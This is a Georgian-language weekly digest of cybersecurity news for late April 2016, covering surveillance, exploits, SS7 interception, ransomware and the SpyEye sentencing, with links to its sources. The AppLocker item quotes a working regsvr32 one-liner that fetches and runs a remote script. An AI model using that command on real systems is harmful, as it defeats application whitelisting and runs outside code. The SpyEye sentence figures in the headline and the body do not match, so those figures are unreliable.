Cyber Week – კვირის მნიშვნელოვანი მოვლენები 20-26 აპრილი

დიდი ბრიტანეთის სადაზვერვო სააგენტოები მილიონობით ადამიანს უთვალთვალებენ

Privacy International-ის მიერ მოგებული სასამართლო საქმის შედეგად გამოქვეყნდა ათასობით დოკუმენტი. ამ დოკუმენტებიდან ირკვევა, რომ დიდი ბრიტანეთის სადაზვერვო სააგენტოები, როგორიცაა MI5, MI6 და GCHQ – მილიონობით ადამიანს უთვალთვალებენ. ჩანაწერების რაოდენობა ასობით მილიონით განისაზღვრება. ეს ჩანაწერები მოიცავენ მოქალაქეთა სამედიცინო ჩანაწერებს, კორესპონდენციებს, ფინანსურ მონაცემებს, კომერციულ აქტივობებს და სხვა. ეს ჩანაწერები იმდენად დიდი მოცულობისაა, რომ მასში მოიპოვება მონაცემები გარდაცვლილ მოქალაქეებზეც კი. დადასტურებულია, რომ თვალთვალი მიმდინარეობს 2001 წლიდან. ახლა, 15 წლის შემდეგ კი ეს სააგენტოები ცდილობენ თვალთვალი დააკანონონ.

http://arstechnica.com/tech-policy/2016/04/uk-secret-police-surveillance-bulk-personal-datasets/

FBI-მ iPhone-ის 0-Day ექსპლოიტში 1.3 მილიონი დოლარი გადაიხადა

კონგრესმენის ტელეფონიFBI-ს დირექტორის ჯეიმს კომეის პრესკონფერენციაზე დაუსვეს შეკითხვა, თუ რამდენი გადაიხადა დაზვერვის ფედერალურმა ბიურომ სან ბერნარდინოს საქმეზე, ტერორისტის კუთვნილი iPhone-ის „გატეხვაში“. რაზეც დირექტორმა უპასუხა, რომ ეს თანხა გაცილებით მეტია, ვიდრე ის აიღებს ხელფასის სახით მთელი მისი დირექტორობის პერიოდში. ჟურნალისტებმა გამოთვალეს: მისი ხელფასი 183,300 დოლარია წელიწადში და ვინაიდან ის კიდევ 7 წელი და 4 თვე იქნება დირექტორის პოზიციაზე, საერთო თანხა 1.34 მილიონ დოლარს აჭარბებს.

http://arstechnica.com/tech-policy/2016/04/fbi-paid-at-least-1-3m-for-zero-day-to-get-into-san-bernardino-iphone/

როგორ უსმენდნენ ჰაკერები ამერიკელ კონგრესმენს ტელეფონზე

გერმანული კიბერუსაფრთხოების კომპანიის სპეციალისტმა Karsten Nohl-მა, ღამის გადაცემაში მოახერხა „გაეტეხა“ ამერიკელი კონგრესმენის Ted Lieu ტელეფონი, რა თქმა უნდა, მისივე თანხმობით. შედეგად კარსტენს შეეძლო არამხოლოდ ყველა შემომავალი და გამავალი ზარის ჩაწერა, არამედ კონგრესმენის გადაადგილებისას მისი ადგილსამყოფელის ზუსტად დადგენა რეალურ დროში.  ტელეფონის დაჰაკვა შესაძლებელი გახდა  სასიგნალო სისტემა ნომერი 7-ში  (SS7) შეღწევის შედეგად. SS7 არის ტელეკომუნიკაციების პროტოკოლი, რომელიც სხვადასხვა ოპერატორის მომხმარებლებს საშუალებას აძლევს ერთმანეთს დაუკავშირდნენ. მას 800-ზე მეტი სატელეკომუნიკაციო კომპანია იყენებს მთელ მსოფლიოში.

http://arstechnica.com/security/2016/04/how-hackers-eavesdropped-on-a-us-congressman-using-only-his-phone-number/

SpyEye-ს შემქმნელ ჰაკერებს 24 წელი მიუსაჯეს

ცნობილი ბოტნეტის SpyEye-ს მთავარ დეველოპერს და კონტრიბუტორს, რუსი ეროვნების ჰაკერს, ალექსანდრ პანინს ჯორჯიის სასამართლომ 7 წლით ციხე მიუსაჯა. ის ასევე დამნაშავედ ცნეს გადარიცხვებისა და საბანკო თაღლითობაში და მილიონობით დოლარის მითვისებაში. მასთან ერთად დამნაშავედ ცნეს და 15 წლით თავისუფლების აღკვეტა მიუსაჯეს 27 წლის ალჟირელ ჰამზა ბენდელაჯს, რომელიც პანინს ვირუსული პროგრამის დეველოპმენტსა და მარკეტინგში ეხმარებოდა. მას დაუმტკიცეს 200,000 საკრედიტო ბარათის გატეხვა და პოტენციურად 100 მილიონი დოლარის ქურდობა.

http://webcache.googleusercontent.com/search?q=cache:nhm82Ct-X3QJ:krebsonsecurity.com/2016/04/spyeye-makers-get-24-years-in-prison/+&cd=1&hl=en&ct=clnk&gl=ge

სატრანსპორტო ინფრასტრუქტურის დაჰაკვა ელემენტარულია

კასპერსკის ლაბორატორიის მიერ ჩატარებულმა კვლევამ აჩვენა, რომ სატრანსპორტო ინფრასტრუქტურის დაჰაკვა ძალიან მარტივია. სატრანსპორტო ინფრასტრუქტურა მოიცავს გზებზე დამონტაჟებულ სენსორებსა და კამერებს, ასევე ე.წ ჭკვიან შუქნიშნებს, რომლებიც თავად არეგულირებენ მოძრაობას სიმჭიდროვის მიხედვით.  აღმოჩნდა, რომ სენსორების ყუთებს ზედ აწერია ვისი წარმოებულია. მწარმოებლის საიტზე კი ყველა ის ბრძანებაა მოცემული, რომელიც ამ მოწყობილობებს შეიძლება გაუგზავნოს მესამე პირმა. შედეგად კასპერსკის სპეციალისტებმა მცირე კვლევის შემდეგ იოლად მოახერხეს მონაცემების შეცვლა და მსუბუქი ავტომობილის ტრაილერად „გადაკეთება“, ასევე სენსორებზე არსებული სიჩქარის მაჩვენებლის შეცვლა. თუ რამდენად სახიფათოა ეს ყველაფერი, ამ ორი მაგალითითაც ნათელია.

http://www.theregister.co.uk/2016/04/22/smart_transport_hackable/

Microsoft-ის AppLocker-სთვის გვერდის ავლა ერთ ხაზიანი კოდით შეიძლება

თუ თქვენ ვინდოუსის სისტემის დასაცავად Microsoft-ის AppLocker-ს იყენებთ, დროა უსაფრთხოებაზე დაფიქრდეთ. AppLocker არის პროგრამა, რომელიც ადმინისტრატორებს საშუალებას აძლევს მოახდინონ მომხმარებელთა დიფერენცირება და მისცენ მათ გარკვეული უფლებები ან შეუზღუდონ ისინი საჭიროებისამებრ. კიბერუსაფრთხოების სპეციალისტმა კეისი სმიტმა აღმოაჩინა, რომ  AppLocker-ის დაცვას შეგვიძლია გვერდი ავუაროთ ერთი მარტივი ბრძანებით. regsvr32 პარსავს მიღებულ ლინკს და თუ ჩვენ ლინკზე არსებულ XML-ში საჭირო კოდს ჩავწერთ, საშუალება გვექნება გავუშვათ ნებისმიერი პროგრამა. ბრძანების მაგალითი: regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

http://www.theregister.co.uk/2016/04/22/applocker_bypass/

TeslaCrypt-ის ახალი ვერსია – ახალი თავისტკივილი

teslacryptთავის დროზე 2015 წელს TeslaCrypt ransomware გამოსვლისას, სპეციალისტებმა მალევე მოახერხეს დეშიფრაციის კოდის დაწერა. იმ პერიოდიდან გარკვეული დრო გავიდა და TeslaCrypt-ის ვერსიამ 4.1-ს მიაღწია, რომელიც ბევრად უფრო გაუმჯობესებულია და დეშიფრაციას შეუძლებელს ხდის. ვირუსის გადმოწერისა და გახსნის შემდეგ, ის უკავშირდება ინტერნეტს, თავად კი იშლება. ახალი ნაკადის მეშვეობით იქმნება ახალი ფეილოუდი, რომელიც შიფრავს ფაილებს და შლის ე.წ Shadow copy ფაილებს. შიფრირებისას დახურული გასაღების მეშვეობით იქმნება საჯარო გასაღები. ეს საშიში ვირუსი ახლა უკვე მეილების მეშვეობითაც ვრცელდება.

https://www.helpnetsecurity.com/2016/04/22/teslacrypt-new-versions-no-decryption/

აუთენთიფიკაციის ახალი მეთოდი – თავის ქალის ხმა

skullულტრასონური სიგნალის თავის ქალაზე მოხვედრისას გამოიცემა უნიკალური ხმა, რომელიც ყველასთვის ინდივიდუალურია. შეიძლება თუ არა რომე ეს ხმა გამოვიყენოთ აუთენტიფიკაციისა და ავტორიზაციისთვის თვალის კომპიუტერებში (როგორიცაა Google Glass)?

ამ კითხვაზე დადებითი პასუხი გასცეს შტუტგარტის, საარლანდისა და მაქს პლანკის უნივერსიტეტის მკვლევარებმა. მათ მიერ ჩატარებულმა ტესტებმა მომხმარებელთა იდენტიფიცირება 97%-იანი სიზუსტით შეძლო, აუთენთიფიკაციისას კი მცდარი მაჩვენებელი მხოლოდ 6.9 პროცენტამდე გაიზარდა.

https://www.helpnetsecurity.com/2016/04/22/password-eyewear-computer/

კიბერუსაფრთხოება ახალი ატომური ბომბია – სტივ ვოზნიაკი

ავსტრალიურ ტელეშოუში Apple-ის თანადამფუძნებელმა სტივ ვოზნიაკმა განაცხადა, რომ კიბერუსაფრთხოება უდიდესი გამოწვევა ატომური ბომბის შემდეგ და კიბერშეტევების საფრთხე ყოველდღიურად მატულობს. “ჩვენ ვნახეთ რა მოხდა უკრაინაში, როდესაც ჰაკერული შეტევის შედეგად მთელი ქალაქი ჩაბნელდა. ნუთუ დადგა დრო როდესაც კიბერშეტევებით შესაძლებელია ენერგეტიკული სისტემების გათიშვა და ხალხის დატოვება ინტერნეტის გარეშე?! რა არის კიბერ შეტევების ზღვარი? ჩვენ ატომური ბომბის გვეშინოდა, ახლა კი კიბერშეტევებისა და ჰაკერების მუდმივი შიში გვაქვს. რაც ყველაზე სახიფათოა, კიბერუსაფრთხოების დონე მცირდება, მაშინ როდესაც კიბერშეტევების დონე და მასშტაბები კატასტროფულად მატულობს” – აცხადებს ვოზნიაკი.

https://hacked.com/cybersecurity-is-the-new-atom-bomb-says-apple-co-founder/

დატოვეთ კომენტარი